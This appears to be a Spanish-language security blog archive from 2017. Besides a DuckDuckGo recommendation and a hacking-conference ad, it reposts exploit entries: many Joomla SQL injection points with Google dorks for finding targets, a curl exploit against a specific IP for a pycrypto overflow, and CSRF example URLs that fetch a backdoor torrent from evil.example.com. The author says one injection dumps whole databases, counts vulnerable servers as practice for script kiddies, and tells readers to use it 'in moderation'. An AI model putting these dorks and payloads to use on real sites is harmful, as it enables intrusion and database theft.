martes, 28 de febrero de 2017

Duck Duck Go: El buscador alternativo que cuida tu privacidad al navegar



Me imagino amigos que se han dado cuenta que google graba todo lo que haces en Internet, almacena tus datos como lo son:  lugares que visitas, tu localización exacta, tus gustos de lo que te interesa comprar, fotos etc. etc., lo peor es que siguen todos tus rastros en Internet  y creo que es tiempo de cambiar de maquina de búsqueda y probar nuevas alternativas y mandar a la fregada a GOOGLE SEARCH.

Pondré  un ejemplo de lo que me esta pasando a mi y se que a todos los que usamos el GOOGLE SEARCH IGUAL.


El otro día andaba buscando las mejores opciones para comprar un DRON para una investigación que estoy haciendo y después de tanta búsqueda encontré el correcto para mi investigación y lógico para mi presupuesto, lo compré  y desde ahí empezó el suplicio con GOOGLE SEARCH,  ahora no deja de mandar información sobre opciones de compra de DRONES y eso es realmente molesto.

Pero lo peor amigos es que GOOGLE SEARCH esta haciendo una mala jugada   queriéndote obligar a que cuando hagas una búsqueda por ejemplo de DRONES, lo primero que te muestra no es la mejor opción para el cliente, si no que muestra los anuncios pagados por las empresa de venta de DRONES que han comprado los espacios publicitarios a GOOGLE.

ESO PARA MI ES UNA TRAMPA vean la imagen:


Como pueden ver en la imagen y específicamente en los recuadros verdes pone las disque mejores opciones de compra pero falsooooooo totalmente falso.........  GOOGLE SEARCH  pone en los primeros 4 resultados de los que le pagan mas por aparecer en esos primeros 4 resultados  y eso para mi ya no me da confianza en esa maquina.

Por eso decidí cambiar de maquinaría y encontré a:



La maquinaria de búsqueda de información en Internet que no te rastrea, no almacena tu información personal y además sus políticas de privacidad son sencillas y que es NO COMPARTIR TU INFORMACIÓN PERSONAL, entre otras ventajas que presumen tener son:

 1.- No rastrean tu información.




2.- DuckDuckGo comenzó como una idea para una mejor experiencia de búsqueda con respuestas más instantáneas y menos spam. 


3.- DuckDuckGo fue anunciado a las Noticias Hacker y comunidades reddit en septiembre del 2008 y hasta el momento sigue con su filosofía de no almacenar datos de los clientes.



4.-  Decidimos hacer un movimiento audaz y no recoger o compartir ninguna de su información personal.




5.-  Lo mejor de todo es que el proyecto es de código abierto y está escrito en Perl, alojado en un servidor Nginx ejecutándose sobre FreeBSD, que también son tecnologías de código abierto. Leyendo su política de privacidad no hay duda sobre sus intenciones:  


Pues amigos a usarlo y a probarlo y dejar de andar siendo rastreados con google.


Saludos

Li. Rodolfo H. Baz.
www.x25.org.mx 


viernes, 24 de febrero de 2017

INICIA: X.25 Hacking Conferences & CWHP MAssive Workshops 2k17

 

BUENOS Tardes VIETNAM comenzamos inscripciones - 2k17
-------------------------------------------------------------------------------

 
El X.25 Ethical Hacking Conferences a través la Certificación Mexicana Certified White Hat Professional organizan en su nueva faceta y en una sola ocasión anual, los cursos de certificación Certified White Hat Professional Massive Edition que te da la posibilidad certificarte en 3 días de talleres especializados e intensivos en las diferentes ramas de la Seguridad informática.

Normalmente vas a un congreso de seguridad a ver y escuchar conferencias que al final solo es eso, en esta ocasión se une el X.25 Ethical Hacking Conferences y la CWHP MAssive Certifications  para darte la posibilidad de que asistas a un congreso a tomar workshops de seguridad y salgas certificado en una de las especialidades que se ofrecerán.

al finalizar el evento obtendrás tu certificación avalada por la STPS 

No. de registro hebr661018tb8-005.

 

La CWHP es una certificación tecnológica que se ofrece a los profesionales en el área de las tecnologías de la información, especialmente a los de habla hispana que está orientada hacia la Seguridad Informática integral en los niveles ofensivo, defensivo y forensia. 

Anunciamos que empiezan las inscripciones al congreso mas grande en México de Seguridad Informática que por mas de 6 años se ha llevado a cabo en México.


--> X.25 Ethical H4cking Conferences

FECHA: 6 al 8 de Octubre del 2017
Sede:  Centro de eventos internacionales
de Xalapa, Ver.

-- CWHP: Massive Workshops 


BENEFICIOS DE ESTOS TALLERES?


Se trata de una certificación eminentemente práctica, que te enseñará a realizar pruebas de penetración aunque no tengas conocimientos previos de hacking.

  • Diploma de certificación avalado por la STPS con el No. HEBR661018TB8-0005
  • Integrarte a los mas de 3 mil especialistas ya certificados por nosotros en los mas de 10 años de experiencia de la CWHP.
  • Talleres 100% prácticos
Tendrás la oportunidad de cursar los talleres en cualquiera de sus 3 niveles en 3 días y al finalizar el evento obtendrás tu certificación avalada por la STPS 

No. de registro hebr661018tb8-005.

Ponentes}


Profesores altamente especializados y con más de 25 años de experiencia en el ramo de la Seguridad Informática, que impartirán los talleres de certificación en las diferentes ramas de especialización como lo es HACKING ÉTICO - INGENIERIA REVERSA y FORENSIA INFORMÁTICA. 


En la página podrás ver los curriculums de los profesores que impartirán los talleres de certificación y notaras que no son improvisados y si tiene toda la experiencia comprobada para poder impartirlos.


MAs información sobre talleres y costos en:

www.x25.org.mx Email: informes@ccat.edu.mx


! NO FALTES !

NOTA: las fotos en la sección de memorias en la página del evento fueron tomadas en los eventos CWHP MAssive edition y X.25 Ethical HAcking Conferences,   no son fotos falsas ni empalmadas de otros eventos para atraer la atención.  SON REALES DE LOS EVENTOS QUE DESDE EL AÑO 2010 SE LLEVAN A CABO EN Mexico.  :p

jueves, 23 de febrero de 2017

WORDPRESS - REV WP-PICShield WordPress plugin is vulnerable to CSRF - 0day 23-02-17



WORDPRESS - ByREV WP-PICShield - Cross-Site Request Forgery 
0day 23-02-17


 Buenos días VIETNAM  y hoy empezamos el día de trabajo anunciando un nuevo bug de WORDPRESS, bueno amigos no es un bug de WORDPRESS si no de un PLUGIN que se instala en el pero que al fin y al cabo afecta a este CMS ya que tiene una vulnerabilidad del tipo:

VULNERABILIDAD:   Cross-Site Request Forgery


Pero que podemos hacer con este ataque?

Es una falsificación de las solicitudes cruzadas, también conocida como ataque con un solo clic  abreviada como CSRF o XSRF, es un tipo técnica de hacking maliciosa donde se transmiten comandos no autorizados de un usuario y que el sitio web ve como confiables a diferencia de los scripts entre sitios (XSS), que explotan la confianza que un usuario tiene para un sitio en particular, CSRF explota la confianza que tiene un sitio en el navegador de un usuario.

Ejemplos de CSRF

Los hackerś pueden buscar y encontrar un link o enlace reproducible que ejecuta una acción específica en la página de destino, mientras la víctima está conectada allí pueden incrustar tal enlace en una página que controlan y engañar a la víctima para que la abra. 

El enlace del portador de ataque puede colocarse en un lugar que la víctima pueda visitar mientras esté conectado al sitio de destino (por ejemplo, un foro de discusión) o enviado en un  correo electrónico HTML o en un archivo adjunto.
 


Hace ya un tiempo un BUG real de CSRF en uTorrent con la clave internacional de vulnerabilidades (CVE-2008-6586) explotó el hecho de que su consola web accesible en localhost: 8080 permitió ejecutar acciones de misión crítica como una simple solicitud GET:


Con la cual forzaron a que un archivo .torrent se descargara con esta instrucción:

     Http: // localhost: 8080 / gui /? Action = add-url & s = http: //evil.example.com/backdoor.torrent


Cambiar la contraseña de administrador de uTorrent
     Http: // localhost: 8080 / gui /? Action = setsetting & s = webui.password & v = eviladmin
 



COmo pueden ver amigos este tipo de vulnerabilidad encontrado es peligrosa, por eos aigos debemos de tener cuidado.

UN saludo

LI. Rodolfo H. Baz.
www-rodolfohbaz.net
  


miércoles, 22 de febrero de 2017

Todos asustados de la vulnerabilidad de WORDPRESS y JOOMLA tiene 5 mas ;p





Como lo digo en el titulo, todo mundo asustados con una vulnerabilidad de WORDPRESS y en JOOMLA acaban de salir 5 mas del tipo SQL INJECTION en los PLUGINS de JOOMLA.

Además todos los días salen vulnerabilidades nuevas de plugins de JOOMLA y WORDPRESS así como también del núcleo de estos sistemas, es mas por ahí me han pasado algunos 0dayz   totalmente funcionales con los cuales se puede uno logear como admin del sitio.

Pero bueno esos en su momento los anunciaremos. 


Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection 
Joomla! Component VehicleManager 3.9 - SQL Injection 
Joomla! Component RealEstateManager 3.9 - SQL Injection 
Joomla! Component BookLibrary 3.6.1 - SQL Injection 
Joomla! Component MediaLibrary Basic 3.5 - SQL Injection 

# # # # #
# Exploit Title: Joomla! Component MediaLibrary Basic v3.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_booklibrary
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
# Demo: http://ordasvit.com/joomla-media-library/
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/view/book/19[SQL]/Ihsan_Sencan
# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=[SQL]
# # # # #
MEJOR ACtualizen SUS JOOMLA Y WORDPRESS.

Saludos

Li.Rodolfo H. Baz


lunes, 20 de febrero de 2017

2 new SQL Injection 0dayz in JOOMLA 20-02-17





Como todos los días amigos, aquí les dejamos dos nuevos 0dayz  para JOOMLA y como siempre los plugins o mejor llamados COMPONENTES son el punto débil de este CMS.

Vulnerabilidad que los afecta: SQL INJECTION
 
Autor:  Ihsan Sencan

Los 0dayz son:

Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection 

# # # # #
# Exploit Title: Joomla! Component PayPal IPN for DOCman v3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_docmanpaypal
# Date: 20.02.2017
# Vendor Homepage: http://shopfiles.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/docman-extensions/paypal-ipn-for-docman/
# Demo: http://demo.shopfiles.com/index.php/paypal-ipn-for-docman
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_docmanpaypal&task=addToCart&id=[SQL]
# # # # #

Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection

 

# # # # #
# Exploit Title: Joomla! Component MaQma Helpdesk v4.2.7 - SQL Injection
# Google Dork: inurl:index.php?option=com_maqmahelpdesk
# Date: 20.02.2017
# Vendor Homepage: http://componentslab.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/maqma-helpdesk/
# Demo: http://demo.componentslab.com/index.php/department/software-support
# Version: 4.2.7
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_maqmahelpdesk&task=pdf_kb&id=[SQL]
# # # # #

Basados en la busqueda del DOrk de estos bugs 0dayz existen mas de:



Servidores que albergan JOOMLA  y son presumiblemente vulnerables...... UP´S  UNA BUENA CANTIDAD para los scriptkidies para practricar.



SALUDOS  AMIGOS  Y ACTUALIZEN SUS COMPLEMENTOS.

LI. RODOLFO H. BAZ
WWW.RODOLFOHBAZ.NET



Python Crypto Regression Vulnerability --> 0day 20-02-17



Amigos empezamos el día con esta vulnerabilidad perteneciente a un desbordamiento de búfer basado en heap en la función ALGnew en block_templace.c en Python Cryptography Toolkit (aka pycrypto).

Esta permite a los atacantes remotos ejecutar código arbitrario en el parámetro iv creado para Cryptmsg.py.

CLAVE CVE


CVE-2013-7459



SISTEMAS VULNERABLES



Ubuntu 12.04 LTS (Precise Pangolin):needs-triage
Ubuntu 14.04 LTS (Trusty Tahr):released (2.6.1-4ubuntu0.1)
Ubuntu Touch 15.04:pending (2.6.1-5ubuntu0.1)
Ubuntu Core 15.04:pending (2.6.1-5ubuntu0.1)
Ubuntu 16.04 LTS (Xenial Xerus):released (2.6.1-6ubuntu0.16.04.1)
Ubuntu 16.10 (Yakkety Yak):released (2.6.1-6ubuntu0.16.10.2)
Ubuntu 17.04 (Zesty Zapus):not-affected (2.6.1-7)


Amigos  actualizar nuestros sistemas.

EXPLOIT:


curl "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?what=enc&msg
=AAAAAAAAAAAAAAAA&key=AAAAAAAAAAAAAAAA&mode=42&iv
=AAAAAAAAAAAAAAAA"

EL EXPLOIT BIEN EXPLICADO:
https://pony7.fr/ctf:public:32c3:cryptmsg

Saludos

Li. Rodolfo H. Baz
www.rodlfohbaz.net

miércoles, 15 de febrero de 2017

JOOMLA 0DAY -> Joomla! Component JoomBlog 1.3.1 - SQL Injection




Buen día amigos.

Cómo siempre poniendo los 0day de las nuevas vulnerabilidades  de los sistemas JOOMLA - WORDPRESS que todos los días nos sorprenden.

En esta ocasión tenemos una SQL INJECTION que se aplica a un componente llamado:

JOOMLA! Component JOOMBLOG 1.3.1

 Con las siguientes características:

# # # # #
# Exploit Title: Joomla! Component JoomBlog v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomblog
# Date: 15.02.2017
# Vendor Homepage: http://joomplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/authoring-a-content/blog/joomblog/
# Demo: http://demo30.joomplace.com/our-products/joomblog/
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomblog&task=tag&tag=Ihsan_Sencan[SQL]
# # # # #
Esta vulnerabilidad afecta a 36,600 +- servidores web en el mundo, esto podemos comprobarlo haciendo una busqueda en google con el DORK proporcionado por el que descubrió este bug.




Amigos actualizen sus componentes de JOOMLA ya que estan al dia las vulnerabiliades.


Saludos.

Li. Rodolfo H. Baz
www.rodolfohbaz.net





martes, 14 de febrero de 2017

Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection 0DAY


Buenos días amigos.

HOy 14 de Febrero día del amor y la amistad les proporcionamos un 0DAY, bueno varios 0day de nuestro estimado JOOMLA, cabe mencionar que no es un 0day de JOOMLA como tal si no de una suite de componentes que programó

Author: Ihsan Sencan

Ahora si le dieron duro y tupido a esta suite de plugins/componentes que se usan en JOOMLA, lo bueno de todo es que muy poca gente lo tiene instalado en su sistema JOOMLA, solo encontré 7 paginas web que lo tenían instalado uff menos mal.




Como sabemos amigos el problema de JOOMLA ah sido el 90% los componentes que programan terceras personas y que por falta de conocimiento en seguridad informática lo dejan vulnerable a ataques ya sea XSS - SQLI  y demás.

Los siguientes que cuentan con una vulnerabilidad de SQL BLIND:

# # # # #
# Exploit Title: Joomla! Component JE Classify Ads 1.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_jeclassifyads
# Date: 13.02.2017
# Vendor Homepage: http://www.joomlaextension.biz/
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/je-classify-ads/
# Demo: http://www.joomlaextension.biz/demo/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jeclassifyads&view=item_detail&pro_id=[SQL]
# # # # #



Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection
Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection
Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection
Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection
Joomla! Component JE Property Finder 1.6.3 - SQL Injection
Joomla! Component JE Tour 2.0 - SQL Injection
Joomla! Component JE Video Rate 1.0 - SQL Injection
Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection
Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection
Joomla! Component JE Awd Song 1.8 - SQL Injection
Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection
Joomla! Component JE Quiz 2.3 - SQL Injection
Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection
Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection
Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection
Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection
Joomla! Component JE Ticket System 1.2 - SQL Injection
Joomla! Component JE Messanger - SQL Injection


*************************************
Espero que los programadores se pongan las pilas aprendiendo como programar BIEN Y SEGURO los componentes de WORDPRESS Y JOOMLA.
************************************

 NECESITAS CONFERENCIAS Y/O TALLERES DE HACKING EN TU UNIVERSIDAD?

CONTACTAME

LI. RODOLFO h. Baz
www.rodolfohbaz.net


lunes, 13 de febrero de 2017

Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection



Amigos pues les comentamos que esta todavia IN THE WILD  este pequeño exploit que tiene que ver con un SQL inyección y pertenece a nuestro y querido amigo JOOMLA.



# # # # #
# Exploit Title: Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection
#
# Date: 12.02.2017
# Vendor Homepage: http://www.jomsoccerbet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
# Demo: http://demo.jomsoccerbet.com/
# Version: 4.1.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_soccerbet&view=userbethistory&userid=[SQL]
# # # # #

En si lo acabo de probar y funciona perfectamente para la extracción de la db con todas sus tablas de un sitio hecho en JOOMLA.

y  hay mas de 1,030  servidores vulnerables a este bug.




 Usenlo con moderación.

Saludos

Li. Rodolfo H. Baz
www.ccat.edu.mx

Crowdstrike -> Solución de errores de actualización de CrowdStrike con BitLocker habilitado

En este pequeño articulo ver como componer el problema de CROWDSTRIKE cuando esta habilitado el BITLOCKER, cabe resaltar que puede ser una e...